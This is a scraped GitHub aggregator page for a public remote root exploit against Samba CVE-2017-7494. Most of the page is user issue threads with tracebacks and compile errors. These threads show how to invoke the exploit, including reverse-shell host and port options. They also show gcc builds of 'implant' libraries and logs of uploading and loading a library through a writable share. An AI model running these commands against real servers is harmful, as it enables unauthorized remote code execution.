joxeankoret / cve-2017-7494 Goto Github PK
View Code? Open in Web Editor NEWRemote root exploit for the SAMBA CVE-2017-7494 vulnerability
License: GNU General Public License v3.0
Remote root exploit for the SAMBA CVE-2017-7494 vulnerability
License: GNU General Public License v3.0
Hi, I'm very curious about how to use it.
Can you add a tutorial to use it?
Thanks. Great job.
Hello,
I was trying to run the exploit, but always got the same message: it seems like the xploit don't find the module on the target.
Any help to get this work? I tried to upload the module using smbclient, but still got the same message.
PS. if the no-compile options is 0, I got several library errors for 32bits.
python cve_2017_7494.py -t 172.16.1.107 -p 445 --rhost=172.20.1.162 --rport=443 -m //libimplantx64.so --no-compile=1
[Wed Sep 5 10:53:05 2018] I will keep the current binaries. No need for new compilation.
[Wed Sep 5 10:53:05 2018] Logging into the Samba server 172.16.1.107:445
[Wed Sep 5 10:53:06 2018] Using a GUEST session
[Wed Sep 5 10:53:06 2018] Trying to load module //libimplantx64.so
[Wed Sep 5 10:53:07 2018] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
HI i gotten this error while executing your script, any idea how to resolve
trying to use the exploit on 139 port:
python cve_2017_7494.py -t -p 139 --rhost --rport 31337 -n 1
and i got this output:
[..] I will keep the current binaries. No need for new compilation.
[..] Logging into the Samba server ip:port
[..] Using a GUEST session
[..] Using libimplantx64.so
[..] Trying to copy library 'n5R8qbmA.so' to share '[u'docs', u'/usr/share/doc']'
Traceback (most recent call last):
File "cve_2017_7494.py", line 254, in
main()
File "cve_2017_7494.py", line 248, in main
if exploit.exploit():
File "cve_2017_7494.py", line 196, in exploit
server_directory = self.try_copy_library(lib_name)
File "cve_2017_7494.py", line 165, in try_copy_library
if self.try_put(share, lib_name, real_file):
File "cve_2017_7494.py", line 117, in try_put
with open(real_file, "rb") as f:
IOError: [Errno 2] No such file or directory: 'libimplantx64.so'
Traceback (most recent call last):
File "cve_2017_7494.py", line 212, in
main()
File "cve_2017_7494.py", line 206, in main
if exploit.exploit():
File "cve_2017_7494.py", line 161, in exploit
if not self.make_library():
File "cve_2017_7494.py", line 89, in make_library
raise Exception("Cannot resolve local IP address!")
Exception: Cannot resolve local IP address!
I am trying to use this exploit against a samba 3.5.11 server but it's not working out of the box. The writable share is called /test
and this exploit is trying to use the full path /usr/local/samba/tmp/
. I am going through the source but thought it might be useful to ask directly how this exploit is determining this path.
Thank you!
root@kali:/CVE-2017-7494# python cve_2017_7494.py -t 10.11.1.129
[Sun Dec 16 10:21:39 2018] Building libraries...
gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx64.so
gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx32.so -m32
[Sun Dec 16 10:21:39 2018] Logging into the Samba server 10.11.1.129:445
[Sun Dec 16 10:21:40 2018] Using a GUEST session
[Sun Dec 16 10:21:40 2018] Using libimplantx64.so
[Sun Dec 16 10:21:40 2018] Trying to copy library 'T1XOvrsK.so' to share '[u'test', u'/usr/local/samba/tmp']'
[Sun Dec 16 10:21:41 2018] Done!
[Sun Dec 16 10:21:41 2018] Trying to copy random library T1XOvrsK.so
[Sun Dec 16 10:21:41 2018] Trying to load module /usr/local/samba/tmp/T1XOvrsK.so
[Sun Dec 16 10:21:41 2018] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx32.so -m32
In file included from implant.c:16:0:
/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: No such file or directory
#include <bits/libc-header-start.h>
^~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
Makefile:10: recipe for target 'libimplantx32.so' failed
make: *** [libimplantx32.so] Error 1
Dear Joxean,
Can you tell me where i did wrong? do i need to change the IP address in config file?
Thank you so much for your help.
req for an argument to put a custom share name
I've cloned the master branch, I've installed the requirements via a venv, and I get this error when running the exploit.
python2 cve_2017_7494.py -t 192.168.1.84
Traceback (most recent call last):
File "cve_2017_7494.py", line 20, in <module>
from impacket.dcerpc.v5 import transport, srvs
File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/dcerpc/v5/transport.py", line 18, in <module>
from impacket.smbconnection import smb, SMBConnection
File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/smbconnection.py", line 20, in <module>
from impacket import smb, smb3, nmb, nt_errors, LOG
File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/smb.py", line 53, in <module>
from impacket.krb5.gssapi import KRB5_AP_REQ
File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/krb5/gssapi.py", line 17, in <module>
from Crypto.Hash import HMAC, MD5
File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/krb5/Crypto.py", line 48, in <module>
from Crypto.Util.number import GCD as gcd
ImportError: No module named Util.number
I've installed both packages :
# pip install pycrypto
# pip show pycrypto
Name: pycrypto
Version: 2.6.1
Summary: Cryptographic modules for Python.
Home-page: http://www.pycrypto.org/
Author: Dwayne C. Litzenberger
Author-email: [email protected]
License: UNKNOWN
Location: /root/.virtualenvs/CVE-2017-7494/lib/python3.9/site-packages
Requires:
Required-by:
# pip install pycryptodome
# pip show pycryptodome
Name: pycryptodome
Version: 3.10.1
Summary: Cryptographic library for Python
Home-page: https://www.pycryptodome.org
Author: Helder Eijs
Author-email: [email protected]
License: BSD, Public Domain
Location: /root/.virtualenvs/CVE-2017-7494/lib/python3.9/site-packages
Requires:
Required-by:
What have I done wrong ? Any ideas ? Thanks :)
Need help on this
[Mon Nov 23 23:34:38 2020] I will keep the current binaries. No need for new compilation.
[Mon Nov 23 23:34:38 2020] Logging into the Samba server 10.0.2.18:445
[Mon Nov 23 23:34:38 2020] Using a GUEST session
[Mon Nov 23 23:34:38 2020] Using libimplantx64.so
[Mon Nov 23 23:34:38 2020] Trying to copy library 'JJAnPsko.so' to share '[u'print$', u'/var/lib/samba/printers']'
[Mon Nov 23 23:34:38 2020] Done!
[Mon Nov 23 23:34:38 2020] Trying to copy random library JJAnPsko.so
[Mon Nov 23 23:34:38 2020] Trying to load module /var/lib/samba/printers/JJAnPsko.so
[Mon Nov 23 23:34:38 2020] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.